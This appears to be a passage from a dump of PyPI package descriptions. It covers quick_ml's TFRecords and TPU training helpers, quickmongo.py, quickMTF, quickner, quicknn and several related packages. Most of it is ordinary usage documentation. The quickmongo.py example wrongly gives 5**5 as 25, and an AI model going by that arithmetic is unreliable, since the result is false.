create_tfrecord_labeled\nfrom quick_ml.tfrecords_maker import get_addrs_labelTo create a tfrecords dataset file from this, the following would be the function call :-create_tfrecord_labeled(addrs, labels, output_filename, IMAGE_SIZE = (192,192))However, you would need the address (addrs) and (labels) and shuffle them up. This has been implemented for you in theget_addrs_label. Follow the line of code below.addrs, labels = get_addrs_labels(DATA_DIR)where DATA_DIR directs to the path of the Dataset with the structure mentioned in the beginning of Labeled Data TFRecords.Obtain the tfrecords file by giving a output_filename you would desire your output file to have using this line of code.create_tfrecord_labeled(addrs, labels, output_filename, IMAGE_SIZE = (192,192))Ensure that you save the Labeled TFRecord Format somewhere as you would require it to read the data at a later stage. Preferred way of achieving this is through saving it in the Markdown cell below the above code cell. After uploading on Kaggle and making dataset public, adding the Labeled TFRecords Format in the Dataset Description.B) Split the Image Dataset Folder in a specified ratio & make tfrecords files.from quick_ml.tfrecords_maker import create_split_tfrecords_dataTo create two tfrecords datasets from the Image Dataset Folder, use the following line of code :-create_split_tfrecords_data(DATA_DIR, outfile1name, outfile2name, split_size_ratio, IMAGE_SIZE = (192,192))DESCRIPTION=>DATA_DIR-> This refers to the Path to the Dataset Folder following the structure mentioned above.outfile1name+outfile2name-> Give names to the corresponding output files obtained through the split of the dataset asoutfile1name&outfile2name.split_size_ratio-> Mention the split size ratio you would to divide your dataset into.IMAGE_SIZE-> The Image Size you would like to set all the images of your dataset in the tfrecords file.RETURNS=>Doesn't return anything. Stores the TFRecords file(s) to your disk. Ensure sufficient disk space.Unlabeled DataFor unlabeled data, make sure to follow the following structure./ Datafile1file2file3file4fileNwhere file1, file2, file3, fileN denote the unlabeled, uncategorized image files. The filenames serve as the Id which is paired with the Images as an identification.This is usually used for test data creation(unknown, unclassified).To make unlabeled TFRecords dataset, you would needcreate_tfrecord_unlabeled&get_addrs_ids.from quick_ml.tfrecords_maker import create_tfrecord_unlabeled\nfrom quick_ml.tfrecords_maker import get_addrs_idsFirst, obtain the image addresses (addrs) and image ids (ids) usingget_addrs_idsin thetfrecords_makermodule.addrs, ids = get_addrs_ids(Unlabeled_Data_Dir)where,Unlabeled_Data_dir refers to the Dataset Folder which follows the structure of unlabeled dataset.After getting the addrs & ids, pass the right parameters for the function to make the TFRecords Dataset for you.unlabeled_dataset = create_tfrecord_unlabeled(out_filename, addrs, ids, IMAGE_SIZE = (192,192))DESCRIPTION=>out_filename- name of the tfrecords outputfile name.addrs- the addrs of the images in the data folder. (can be obtained using get_addrs_ids())ids- the ids of the imahes in the data folder. (can be obtained using get_addrs_ids())IMAGE_SIZE- The Image Size of each image you want to have in the TFRecords dataset. Default, (192,192).RETURNS=>A TFRecords dataset with examples with 'image' as the first field & 'idnum' as the second field.Visualize & Check the DataAfter creating your TFRecords Dataset (labeled or unlabeled), you would like to check and glance through your dataset. For this import,visualize_and_check_datafromquick_ml.To get started, write the following line of code. :-from quick_ml.visualize_and_check_data import check_one_image_and_label, check_batch_and_labels, check_one_image_and_id, check_batch_and_idsAvailable methods are :-check_one_image_and_labelcheck_batch_and_labelscheck_one_image_and_idcheck_batch_and_idscheck_one_image_and_labelUse this for checking labeled TFRecords Dataset. It displays only one image along with its label when the labeled TFRecords dataset is passed as an argument.check_one_image_and_label(tfrecord_filename)Description=>Displays one image along with its label.Pass the tfrecord_filename as the argument. It will display one image along with its label from the tfrecords dataset.check_batch_and_labelsUse this for checking labeled TFRecords Dataset. It displays a grid of images along with their labels given the tfrecords dataset passed as an argument.check_batch_and_labels(tfrecord_filename, n_examples, grid_rows, grid_columns, grid_size = (8,8)Description=>Displays a grid of images along with their labels.Pass the tfrecord_filename, the number of examples to see (n_examples), divide the n_examples into product of rows (grid_rows) and columns (grid_columns) such that n_examples = grid_rows * grid_columns. Finally the grid_size as a tuple, Default (8,8) as an argument. It will display a grid of images along with their labels from the tfrecords dataset.check_one_image_and_idUse this for checking unlabeled TFRecords Dataset. It displays only one image along with its id when the unlabeled TFRecords dataset is passed as an argument.check_one_image_and_id(tfrecord_filename)Description=>Displays one image along with its id.Pass the tfrecord_filename as the argument. It will display one image along with its id from the tfrecords dataset.check_batch_and_idsUse this for checking unlabeled TFRecords Dataset. It displays a grid of images along with their ids given the tfrecords dataset passed as an argument.check_batch_and_ids(tfrecord_filename, n_examples, grid_rows, grid_columns, grid_size = (8,8)Description=>Displays a grid of images along with their ids.Pass the tfrecord_filename, the number of examples to see (n_examples), divide the n_examples into product of rows (grid_rows) and columns (grid_columns) such that n_examples = grid_rows * grid_columns. Finally the grid_size as a tuple, Default (8,8) as an argument. It will display a grid of images along with their ids from the tfrecords dataset.Begin working w/ TPUThis helps you to get the TPU instance, TPU strategy, load the training dataset, validation dataset & test dataset from their TFRecords file & GCS_DS_PATH.To get all the required utilities, use the following line of code.from quick_ml.begin_tpu import define_tpu_strategy, get_training_dataset, get_validation_dataset, get_test_datasetAvailable Methods & Functionalities=>define_tpu_strategyget_training_datasetget_validation_datasetget_test_datasetdefine_tpu_strategyThis returns the tpu instance and the tpu strategy.strategy, tpu = define_tpu_strategy()get_training_datasetHelps you load the tfrecords file (TRAINING DATASET).train_dataset = get_training_dataset(GCS_DS_PATH, train_tfrec_path, BATCH_SIZE)Description=>GCS_DS_PATH- The GCS Bucket Path of the tfrecords dataset.train_tfrec_path- the train tfrecords filename path. eg. '/train.tfrecords'BATCH_SIZE- Select the batch size for the images to load in the training dataset instance.Returns=>A tfrecords dataset instance which can be fed to model training as the training dataset.get_validation_datasetHelps you load the tfrecords file (VALIDATION DATASET).val_dataset = get_validation_dataset(GCS_DS_PATH, val_tfrec_path, BATCH_SIZE)Description=>GCS_DS_PATH- The GCS Bucket Path of the tfrecords dataset.val_tfrec_path- the validation tfrecords filename path. eg. '/val.tfrecords'BATCH_SIZE- Select the batch size for the images to load in the validation dataset instance.Returns=>A tfrecords dataset instance which can be fed to model training as the validation dataset.get_test_datasetHelps you load the tfrecords file (TEST DATASET).test_dataset = get_test_dataset(GCS_DS_PATH, test_tfrec_path, BATCH_SIZE)Description=>GCS_DS_PATH- The GCS Bucket Path of the tfrecords dataset.test_tfrec_path- the test tfrecords filename path. eg. '/test.tfrecords'BATCH_SIZE- Select the batch size for the images to load in the test dataset instance.Returns=>A tfrecords dataset instance which can be used for prediction as test dataset.Create Model QuicklyThis helps you to create a model ready for training all in a single line of code.This includes loading the pretrained model along with the weights, addition of the the classification model on top of pretrained model and the compilation of the model. All in a single line of code.The function is situated in theload_models_quickmodule ofquick_mlpackage.from quick_ml.load_models_quick import create_modelcreate_model()function parameters/arguments :-model = create_model(classes, model_name = 'VGG16', classification_model = 'default', freeze = False, input_shape = [512, 512,3], activation = 'softmax', weights= \"imagenet\", optimizer = 'adam', loss = 'sparse_categorical_crossentropy', metrics = 'sparse_categorical_accuracy')Arguemnts Description=>classes- Number of classes for classification.model_name- Name of the model. Default, VGG16.Available models ->MODELS -> 'VGG16', 'VGG19','Xception','DenseNet121', 'DenseNet169', 'DenseNet201','ResNet50', 'ResNet101', 'ResNet152', 'ResNet50V2', 'ResNet101V2', 'ResNet152V2','MobileNet', 'MobileNetV2','InceptionV3', 'InceptionResNetV2','EfficientNetB0', 'EfficientNetB1', 'EfficientNetB2', 'EfficientNetB3', 'EfficientNetB4', 'EfficientNetB5', 'EfficientNetB6', 'EfficientNetB7'classification_model- The classification model which you want to attach as the top to the pretrained model. The 'default' classification model has a Global Average Pooling2D followed by Dense layer with output nodes same as the number of classes for classification.You can define your own classification_model (Sequential Model) and pass the model as an argument to the classification model.class_model = tf.keras.Sequential([\ntf.keras.layers(),\ntf.keras.layers()\n])\n\nget_models_training_report(models, tpu, n_class, traindata, steps_per_epoch, epochs, val_data, classification_model = class_model)freeze- True or False. Whether or not to freeze the pretrained model weights while training the model. Default, False.input_shape- Input shape of the images of the TFRecords Dataset. Default, [512,512,3]activation- The activation function to be used for the final layer of the classification model put on top of the pretrained model. For Binary Classification, use 'sigmoid'. For multi-class classification, use 'softmax'. Default, 'softmax'.weights- What kind of weights to use for the pretrained model you have decided as your model backbone. Default, 'imagenet'. Options, 'imagenet' & None. In case you are using 'imagenet' weights, ensure you have loadedTF Keras pretrained weightsin your Kaggle Notebook.optimizer- The optimizer to be used for converging the model while training. Default, 'adam'.loss- Loss function for the model while training. Default, 'sparse_categorical_crossentropy'. Options, 'binary_crossentropy' or 'sparse_categorical_crossentropy'. Use 'binary_crossentropy' for Binary Classifications. Use 'sparse_categorical_crossentropy' for multi-class classifications. Support for 'categorical_crossentropy' is not provided as it is computationally expensive. Both sparse & categorical cross entropy serve the same purpose.metrics- The metrics for gauging your model's training performance. Default, 'sparse_categorical_accuracy'. Options, 'sparse_categorical_accuracy' & 'accuracy'. For Binary Classifications, use 'accuracy'. For Multi-class classifications, use 'sparse_categorical_accuracy'.Returns=>A tf.keras.SequentialcompiledModel with base model as the pretrained model architecture name specified along with the classification model attached. This model isready for trainingvia model.fit().Models Training ReportThis utility function is designed for getting to know which models are the best for the dataset at hand. Manually training models one by one is troublesome as well as cumbersome. A smart and quick way of achieving this is by using theget_models_training_report()fromquick_ml.training_predictions.To get started, import thetraining_predictionsmodule fromquick_mlfrom quick_ml.training_predictions import get_models_training_reportAfter passing in the arguments for get_models_training_report, you will obtain a pandas dataframe. However, before getting into the details of the output and what are the parameters to be passed to the function, let's take a quick view of the table output format.Output Table OverviewTable Preview of the Pandas DataFrame that is return upon calling the function to obtain training_report.Model NameTrain_top1_AccuracyTrain_top3_AccuracyVal_top1_AccuracyVal_top3_AccuracyModel_197.1969493.1Model_296.2929391Model_3989697.196Model_490878583Model_570615551Model_691869088Table Description :-1) Model Name -> Name of the model trained on the dataset2) Top 1 Accuracy -> The last accuracy score on training dataset3) Top 3 Accuracy -> The average of the last 3 accuracy scores on training dataset4) Val Top 1 Accuracy -> The last validation accuracy score on validation dataset5) Val Top 3 Accuracy -> The average of the last 3 validation accuracy scores on validation datasetUsing Models Training ReportOnce you have successfully importedget_models_training_report, pass the arguments as per your requirement. The function returns a pandas dataframe with a table similar to above. The arguemnts are -get_models_training_report(models, tpu, n_class, traindata, steps_per_epoch, epochs, val_data, classification_model = 'default', freeze = False, input_shape = [512,512,3], activation = 'softmax', weights = 'imagenet', optimizer = 'adam', loss = 'sparse_categorical_crossentropy', metrics = 'sparse_categorical_accuracy', plot = False)Arguments Description->models- list of models to obtain the training report on. eg.models = ['VGG16', 'EfficientNetB7', 'InceptionV3', 'ResNet50']tpu- The TPU instancen_class- number of classes in the Datasettraindata- The training dataset (In TFRecords Dataset)steps_per_epoch- number of steps to be taken per epoch. Ideally, it should be number of training images // BATCH_SIZEepochs- Number of epochs for which models are to be trained.val_data- The validation dataset (In TFRecords Dataset)classification_model- The classification model which you want to attach as the top to the pretrained model. The 'default' classification model has a Global Average Pooling2D followed by Dense layer with output nodes same as the number of classes for classification.You can define your own classification_model (Sequential Model) and pass the model as an argument to the classification model.class_model = tf.keras.Sequential([\ntf.keras.layers(),\ntf.keras.layers()\n])\n\nget_models_training_report(models, tpu, n_class, traindata, steps_per_epoch, epochs, val_data, classification_model = class_model)freeze- Whether or not you want to freeze the pretrained model weights. Default, False.input_shape - Defines the input_shape of the images of the dataset. Default, [512,512,3]activation- The activation function for the final Dense layer of your Classification model. Default, 'softmax'. For binary classification, change to 'sigmoid' with n_class = 1.weights- The pretrained Model weights to be taken for consideration. Default, 'imagenet'. Support for 'noisy-student' coming soon.optimizer - The optimizer for the model to converge while training. Default, 'adam'loss- loss function to consider while training your deep learning model. Two options supported. 'Sparse Categorical CrossEntropy' & 'Binary Cross Entropy'. Default, 'Sparse Categorical CrossEntropy'.metrics- The metric to be taken under consideration while training your deep learning model. Two options available. 'accuracy' & 'sparse_categorical_accuracy'. Use 'accuracy' as a metric while doing Binary Classification else 'sparse_categorical_accuracy'. Default, 'sparse_categorical_accuracy'.plot- Plot the training curves of all the models for quick visualization. Feature Coming soon.Returns=>A Pandas Dataframe with a table output as shown above. You can save the function output in a variable and save the dataframe to your disk using .to_csv() method.CallbacksIn case, the classes of your dataset contain high similarity index, in such cases, it is imperative to have callbacks necessary for your model training and convergence. For obtaining such a model, callbacks are often used.\nThis utility aims at providing callbacks which are oftenly used while training deep learning models and returns a list of callbacks. Pass this as an argument while training deep learning models.from quick_ml.callbacks import callbacksLearning Rate SchedulerThere are 3 different types of learning rate schedulers.RAMPUP Learning Rate SchedulerSimple Learning Rate SchedulerStep-wise Learning Rate SchedulerEarly Stopping CallbackUse Early Stopping Callback as a measure to prevent the model from overfitting. The default callback setting is as followsmonitor : 'val_loss', min_delta = 0, patience = 0, verbose = 0,mode = 'auto', baseline = None, restore_best_weights = False.To use the default settings of Early Stopping Callback, passcallbacks = callbacks(early_stopping = \"default\")Readuce LR On PlateauPrevent your model from getting stuck at local minima using ReduceLROnPlataeu callback. The default implementation has the following parameter settings =>'monitor' : 'val_loss', 'factor' : 0.1, 'patience' : 10, 'verbose' : 0, mode = 'auto', min_delta = 0.0001, cooldown = 0, min_lr = 0Combine Multiple callbackscallbacks = callbacks(lr_scheduler = 'rampup', early_stopping = 'default', reduce_lr_on_plateau = 'default' )PredictionsThe package supports multlipe options to obtain predictions on your testDataset (only TFRecords Format Dataset).Supported Methods for obtaining predictions ->get_predictionsensemble_predictionsModel AveragingModel WeightedTrain K-Fold (Coming Soon)Test Time Augmentatios (Coming Soon)Get PredictionsObtain predictions on theTEST TFRECORDS Data Formatusing get_predictions().Two call types have been defined for get_predictions().Import the predictions function.from quick_ml.predictions import get_predictionsFirst Definition ->Use this function definition when you have the GCS_DS_PATH, test_tfrec_path, BATCH_SIZE.This is usually helpful when you have a trained model weights from a different session and want to obtain predictions in a different session. Usually beneficial if there are multiple models from whom predictions are to be obtained. Training of multiple models using get_models_training_report() from quick_ml.training_predictions in one session. Saving the best model weights in the same session using create_model() from quick_ml.load_models_quickly. Testing/Predictions in a different session for multiple models using this function definition. This is the best way to deal with multiple models.predictions = get_predictions(GCS_DS_PATH, test_tfrec_path, BATCH_SIZE, model)Second DefinitionUse this function when you have testTFDataset and model.This function definition is usually the best option when you have one model and want to obtain the predictions in the same session. For this, you must have loaded the datasets before. However, you are free to explore better possibilites with the above two functions.prediction = get_predictions(testTFdataset, model)K-Fold Training & PredictionsK-Fold Cross Validation is usually performed to verify that the selected model's good performance isn't due to data bias.This would be highly beneficial after obtaining Training Report of the models and you have selected your model architecture you would be working with.To get started with K-Fold Cross Validation & Predictions,from quick_ml.k_fold_training import train_k_fold_predictFunction Definition :-train_k_fold_predict(k, tpu, train_tfrecs, val_tfrecs, test_tfrecs, GCS_DS_PATH, BATCH_SIZE)Description=>k-> The number of folds. Usually, 5 or 10.tpu-> the tpu instance. To be obtained from get_strategy()train_tfrecs-> The complete path location of the tfrecord files of training dataset.val_tfrecs-> The complete path location of the tfrecord files of the validation dataset.test_tfrecs-> The complete path location of the tfrecord files of the test dataset.GCS_DS_PATH-> The Google Cloud Bucket Service Location of the Dataset.BATCH_SIZE-> Select the batch size of the training dataset. Usually, the value should be a multiple of 128 for efficient utilization of TPUs.Returns=>Doesn't return anything. Saves an output file with the result of each fold training along with its validation result.ExamplesFollowing are few Kaggle Notebooks showing the working ofquick_mlpython package.TFRecords Dataset Making ->Notebook 1Binary Classification ->Notebook 2Multi-Class Classification ->Notebook 3Feedback & DevelopmentWant to contribute? Great!Send your ideas toantoreepjana@gmail.comand ensure the format of the subject of the mail as\n[quick_ml Contribute] -> [Your Subject]Want to suggest an improvement or a feature? Most Welcome!Send your ideas toantoreepjana@gmail.comand ensure the format of the subject of the mail as [quick_ml Suggestion] -> [Your Subject]Want to share errors or complaint something which you didn't like? That's how it improves ;)Send your grievances toantoreepjana@gmail.comand ensure the format of the subject of the mail as [quick_ml Grievances] -> [Your Subject]Want to send love, thanks and appreciation? I'd love to hear from you!Send your love toantoreepjana@gmail.comand ensure the format of the subject of the mail as [quick_ml Feedback] -> [Your Subject]Upcoming Features!Data Augmentations on TPU.Support for Hyper-Parameter TuningLicenseMITFree Software, Hell Yeah!"} +{"package": "quickmock", "pacakge-description": "No description available on PyPI."} +{"package": "quick-mock", "pacakge-description": "quick-mockquick mock serverA Simple Examplemock create project hello\ncd hello\nmockcreate projectmock create project create interfacemock create interface run mock serveruse default port(5000): mock\n\nspecify port: mock run port "} +{"package": "quickmongo.py", "pacakge-description": "Quick IntroQuickmongo.py is a quick wrapper for pymongo to access mongodb! You can use pymongo if you know it!Quick DocsInstallationIn your terminal:pip install quickmongo.pyIn your python file:fromquickmongoimportDatabase# If you are using locallydb=Database('mongodb://localhost:27017/',{'db_name':'local'})# if you are using 'mongodb+srv://' uri then you should do something like thisdb=Database(mongoURL)# mongourl will be the 'mongodb+srv://' uri link# clusterName will be the name of the mongoose cluster. Eg:- Cluster0# Incase if you don't know what is your clustername you will get an TypeError with available clusters!Options of DatabasesSet some options for your database as a dict which is optionaloptions={'collection_name':'yourCollectionName',# Collection name will be 'python' as default'db_name':'Cluster0'# This is optional unless you are using localhost you have to set it to local!}db=Database(mongoURL,options)# mongoURL is described aboveGet databases and collections# Get all database names under the linkprint(db.all_database_names())# Check if the given database exists in the listprint(db.database_exists('Cluster0'))# Get all collections names under the linkprint(db.all_collection_names())# Check if the given collection exists in the listprint(db.collection_exists('python'))All Operationsdb.set('foo','bar')# Will set value 'bar' for the key 'foo'db.get('foo')# Will return 'bar' which is the value of the key 'foo'db.all()# Will return all keys and values of the collection! {'key': 'foo', 'value': 'bar'} as a dictdb.startswith('f')# Will sort all data whose keys startswith 'f' as {'key': 'foo', 'value': 'bar'}db.delete('foo')# Will delete value of the key 'foo'db.delete_all()# Will delete all values of the all keys! Simple drop() functiondb.set('foo',1)# Simple set function given description abovedb.add('foo',2)# Will add 2 to the old value. So the current value will be 3db.subtract('foo',1)# Will subtract 1 from old value of the key 'foo'. So the current value will be 1db.math('foo','*',5)# Will multiply value by 5 so 1*5 = 5db.math('foo','**',5)# 5**5 = 25db.math('foo','/',5)# 25/5 = 5db.math('foo','+',1)# 5+1 = 6db.math('foo','-',1)# 6-1 = 5db.typeof('foo')# Its currently int so it will return EventsEvents are functions which will trigger on paticular timesReady Event:defready():print('Connected with database')db=Database(mongoURL='your-url',events={'ready':ready})# Will run ready callback when db is ready!Contribute codes to this packages by githubhereSupportJoin our Discord ServerGitHub Repo"} +{"package": "quick-montage", "pacakge-description": "No description available on PyPI."} +{"package": "quickmpc", "pacakge-description": "No description available on PyPI."} +{"package": "quickMTF", "pacakge-description": "Copyright (c) 2022 lorry_rui , Fremont ,USAPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.*for image quaility test purpose like lens focus test @ Lorry RUi=======================\nHomepage: quickMTFPyPI Package PageSource Code.. image::https://github.com/Lorrytoolcenter/quickMTF/doc/linepair2.png:align: center\n.. image:: doc/linepair2.png\n:width: 600:github_url:https://github.com/Lorrytoolcenter/quickMTFMain FeaturesQuick calculation of MTF values for both linepair and slant edge MTF.Built-in GUI for image debugging and location picking.Plot MTF chartGUI:Check measure position percentage featureUndo:Undo one test.Clear all:Clear all tests.Save current display:Save the current scene.Save current image:Save the image with markers based on image size.Mail to: :lorryruizhihua@gmail.comThis is a GUI Sample.. image::https://github.com/Lorrytoolcenter/quickMTF/doc/manual.png.. image:: doc/manual.png\n:width: 600.. image:: doc/sfr.png\n:width: 600sample code for using lib quickMTF.. code-block:: pythonfrom quickMTF.quickMTF import quickMTF\nimport cv2ifname== 'main':\ntest = quickMTF()\nROI_width = 600\nROIX = 1593\nROIY = 1500\nimage = cv2.imread(\"image.jpg\")\nimage = image[ROIY:ROIY+10, ROIX:ROIX+ROI_width]print(test.quicklinepairMTF(image, library='cv2')) # linepair chart MTF value and pixels/line pair\n print(test.quicksfrMTF(image, cp=0.5)) # CP means cycles/pixel and out MTF value per c/p and slant angle\n print(test.quicksfrCP(image, mtf_indx=30)) # MTFindex means MTF and out Cycles/pixel per MTF value and slant angle"} +{"package": "quickmysql", "pacakge-description": "a tool to simplify common mysql tasks"} +{"package": "quickNAT-pytorch", "pacakge-description": "No description available on PyPI."} +{"package": "quickner", "pacakge-description": "Quickner \u26a1A simple, fast, and easy to use NER annotator for PythonQuickner is a new tool to quickly annotate texts for NER (Named Entity Recognition). It is written in Rust and accessible through a Python API.Quickner is blazing fast, simple to use, and easy to configure using a TOML file.Installation# Create a virtual environmentpython3-mvenvenvsourceenv/bin/activate# Install quicknerpipinstallquickner# or pip3 install quicknerUsageUsing the config filefromquicknerimportQuickner,Configconfig=Config(path=\"config.toml\")# or Config() if the config file is in the current directory# Initialize the annotatorquick=Quickner(config=config)# Annotate the texts using the config filequick.process()# or annotator.process(True) to save the annotated data to a fileUsing DocumentsfromquicknerimportQuickner,Document# Create documentsrust=Document(\"rust is made by Mozilla\")python=Document(\"Python was created by Guido van Rossum\")java=Document(\"Java was created by James Gosling\")# Documents can be added to a listdocuments=[rust,python,java]# Initialize the annotatorquick=Quickner(documents=documents)quick>>>Entities:0|Documents:3|Annotations:>>>quick.documents[Document(id=\"87e03d58b1ba4d72\",text=rustismadebyMozilla,label=[]),Document(id=\"f1da5d23ef88f3dc\",text=PythonwascreatedbyGuidovanRossum,label=[]),Document(id=\"e4324f9818e7e598\",text=JavawascreatedbyJamesGosling,label=[])]>>>quick.entities[]Using Documents and EntitiesfromquicknerimportQuickner,Document,Entity# Create documents from textstexts=(\"rust is made by Mozilla\",\"Python was created by Guido van Rossum\",\"Java was created by James Gosling at Sun Microsystems\",\"Swift was created by Chris Lattner and Apple\",)documents=[Document(text)fortextintexts]# Create entitiesentities=((\"Rust\",\"PL\"),(\"Python\",\"PL\"),(\"Java\",\"PL\"),(\"Swift\",\"PL\"),(\"Mozilla\",\"ORG\"),(\"Apple\",\"ORG\"),(\"Sun Microsystems\",\"ORG\"),(\"Guido van Rossum\",\"PERSON\"),(\"James Gosling\",\"PERSON\"),(\"Chris Lattner\",\"PERSON\"),)entities=[Entity(*(entity))forentityinentities]# Initialize the annotatorquick=Quickner(documents=documents,entities=entities)quick.process()>>>quickEntities:6|Documents:3|Annotations:PERSON:2,PL:3,ORG:1>>>quick.documents[Document(id=87e03d58b1ba4d72,text=rustismadebyMozilla,label=[(0,4,PL),(16,23,ORG)]),Document(id=f1da5d23ef88f3dc,text=PythonwascreatedbyGuidovanRossum,label=[(0,6,PL),(22,38,PERSON)]),Document(id=e4324f9818e7e598,text=JavawascreatedbyJamesGosling,label=[(0,4,PL),(20,33,PERSON)])]Find documents by label or entityWhen you have annotated your documents, you can use thefind_documents_by_labelandfind_documents_by_entitymethods to find documents by label or entity.Both methods return a list of documents, and are not case sensitive.Example:# Find documents by label>>>quick.find_documents_by_label(\"PERSON\")[Document(id=f1da5d23ef88f3dc,text=PythonwascreatedbyGuidovanRossum,label=[(0,6,PL),(22,38,PERSON)]),Document(id=e4324f9818e7e598,text=JavawascreatedbyJamesGosling,label=[(0,4,PL),(20,33,PERSON)])]# Find documents by entity>>>quick.find_documents_by_entity(\"Guido van Rossum\")[Document(id=f1da5d23ef88f3dc,text=PythonwascreatedbyGuidovanRossum,label=[(0,6,PL),(22,38,PERSON)])]>>>quick.find_documents_by_entity(\"rust\")[Document(id=87e03d58b1ba4d72,text=rustismadebyMozilla,label=[(0,4,PL),(16,23,ORG)])]>>>quick.find_documents_by_entity(\"Chris Lattner\")[Document(id=3b0b3b5b0b5b0b5b,text=SwiftwascreatedbyChrisLattnerandApple,label=[(0,5,PL),(21,35,PERSON),(40,45,ORG)])]Get a Spacy Compatible Generator ObjectYou can use thespacymethod to get a spacy compatible generator object.The generator object can be used to feed a spacy model with the annotated data, you still need to convert the data into DocBin format.Example:# Get a spacy compatible generator object>>>quick.spacy()# Divide the documents into chunks>>>chunks=quick.spacy(chunks=2)>>>forchunkinchunks:...print(chunk)...[('rust is made by Mozilla',{'entitiy':[(0,4,'PL'),(16,23,'ORG')]}),('Python was created by Guido van Rossum',{'entitiy':[(0,6,'PL'),(22,38,'PERSON')]})][('Java was created by James Gosling at Sun Microsystems',{'entitiy':[(0,4,'PL'),(20,33,'PERSON'),(37,53,'ORG')]}),('Swift was created by Chris Lattner and Apple',{'entitiy':[(0,5,'PL'),(21,34,'PERSON'),(39,44,'ORG')]})]Single document annotationYou can also annotate a single document with a list of entities.This is useful when you want to annotate a document with a list of entities is not in the list of entities of the Quickner object.Example:fromquicknerimportDocument,Entity# Create a document from a string# Method 1rust=Document.from_string(\"rust is made by Mozilla\")# Method 2rust=Document(\"rust is made by Mozilla\")# Create a list of entitiesentities=[Entity(\"Rust\",\"PL\"),Entity(\"Mozilla\",\"ORG\")]# Annotate the document with the entities, case_sensitive is set to False by default>>>rust.annotate(entities,case_sensitive=True)>>>rustDocument(id=\"87e03d58b1ba4d72\",text=rustismadebyMozilla,label=[(16,23,ORG)])>>>rust.annotate(entities,case_sensitive=False)>>>rustDocument(id=\"87e03d58b1ba4d72\",text=rustismadebyMozilla,label=[(16,23,ORG),(0,4,PL)])Load from fileInitialize the Quickner object from a file containing existing annotations.Quickner.from_jsonlandQuickner.from_spacyare class methods that return a Quickner object and are able to parse the annotations and entities from a jsonl or spaCy file.fromquicknerimportQuicknerquick=Quickner.from_jsonl(\"annotations.jsonl\")# load the annotations from a jsonl filequick=Quickner.from_spacy(\"annotations.json\")# load the annotations from a spaCy fileConfigurationThe configuration file is a TOML file with the following structure:# Configuration file for the NER tool[general]# Mode to run the tool, modes are:# Annotation from the start# Annotation from already annotated texts# Load annotations and add new entities[logging]level=\"debug\"# level of logging (debug, info, warning, error, fatal)[texts][texts.input]filter=false# if true, only texts in the filter list will be usedpath=\"texts.csv\"# path to the texts file[texts.filters]accept_special_characters=\".,-\"# list of special characters to accept in the text (if special_characters is true)alphanumeric=false# if true, only strictly alphanumeric texts will be usedcase_sensitive=false# if true, case sensitive search will be usedmax_length=1024# maximum length of the textmin_length=0# minimum length of the textnumbers=false# if true, texts with numbers will not be usedpunctuation=false# if true, texts with punctuation will not be usedspecial_characters=false# if true, texts with special characters will not be used[annotations]format=\"spacy\"# format of the output file (jsonl, spaCy, brat, conll)[annotations.output]path=\"annotations.jsonl\"# path to the output file[entities][entities.input]filter=true# if true, only entities in the filter list will be usedpath=\"entities.csv\"# path to the entities filesave=true# if true, the entities found will be saved in the output file[entities.filters]accept_special_characters=\".-\"# list of special characters to accept in the entity (if special_characters is true)alphanumeric=false# if true, only strictly alphanumeric entities will be usedcase_sensitive=false# if true, case sensitive search will be usedmax_length=20# maximum length of the entitymin_length=0# minimum length of the entitynumbers=false# if true, entities with numbers will not be usedpunctuation=false# if true, entities with punctuation will not be usedspecial_characters=true# if true, entities with special characters will not be used[entities.excludes]# path = \"excludes.csv\" # path to entities to exclude from the searchFeatures Roadmap and TODOAdd support for spaCy formatAdd support for brat formatAdd support for conll formatAdd support for jsonl formatAdd support for loading annotations from a json spaCy fileAdd support for loading annotations from a jsonl fileFind documents with a specific entity/entities and return the documentsAdd support for loading annotations from a brat fileSubstring search for entities in the text (case sensitive and insensitive)Partial match for entities, e.g. \"Rust\" will match \"Rustlang\"Pattern/regex based entites, e.g. \"Rustlang\" will match \"Rustlang 1.0\"Fuzzy match for entities with levenstein distance, e.g. \"Rustlang\" will match \"Rust\"Add support for jupyter notebookLicenseMOZILLA PUBLIC LICENSE Version 2.0ContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.Please make sure to update tests as appropriate.Authors[Omar MHAIMDAT]"} +{"package": "quicknet", "pacakge-description": "UNKNOWN"} +{"package": "quick-netmiko", "pacakge-description": "BRANCHSTATUSmasterdevelopquick_netmikoJust a quick way to use Netmiko to get command output from devices"} +{"package": "quicknn", "pacakge-description": "QuickNNThequicknnis a Tensorflow-based package that aims to simplify the application of the feedforward neural networks in classification and regression problems.\nThe main features of thequicknnpackage are:internally management of the categorical variables with one-hot-encoding(OHE) method batch-wise, just you have to feed it with pandas object;internally management of the validation of the data while training;possibility to stop the training phase, change some parameters and then resume the training from where it had remained;allows easy visualization of the learning curves usingTensorboard;ExamplefromquicknnimportQuickNNfromsklearn.datasetsimportload_bostonfromsklearn.model_selectionimporttrain_test_splitX,y=load_boston(return_X_y=True)X_train,X_val,y_train,y_val=train_test_split(X,y,test_size=0.25)qnn=QuickNN(list_neurons=[100,200,1])qnn.fit(X_train,y_train,n_epochs=10)## In IPython session you can stop-change-resume the training.qnn.fit(X_train,y_train,n_epochs=20)## Just increasing the n_epochs.qnn.fit(X_train,y_train,n_epochs=30,learning_rate=0.01)## You can change e.g., the learning_rate param while trainingy_pred=qnn.predict(X_val)InstallingThe dependencies are showed inrequirements.txt, which can be installed with the command:$pipinstall-rrequirements.txtThen the library can easily downloaded through pip:$pipinstallquicknnLicenseThis project is licensed under the MIT License - see theLICENSE.mdfile for details.ReferencesIPythonTensorpandasscikit-learnpath.py"} +{"package": "quicknote", "pacakge-description": "A cursors full screen command line application based on the OSX note taking app\nNotational Velocity."} +{"package": "quick-ollama", "pacakge-description": "No description available on PyPI."} +{"package": "quickops", "pacakge-description": "No description available on PyPI."} +{"package": "quick_orm", "pacakge-description": "News: quick_orm is fully compatible with the newest SQLAlchemy 0.7.9.Notice: quick_orm is NOT YET compatible with SQLAlchemy 0.8.x.IntroductionPython ORM framework which enables you to get started in less than a minute!Super easy to setup and super easy to use, yet super powerful!You would regret that you didn\u2019t discorver it earlier!Featuresquick: you could get and play with it in less than a minute. It couldn\u2019t be more straightforward.easy: you don\u2019t have to write any SQL statements, including those \u201ccreate table xxx 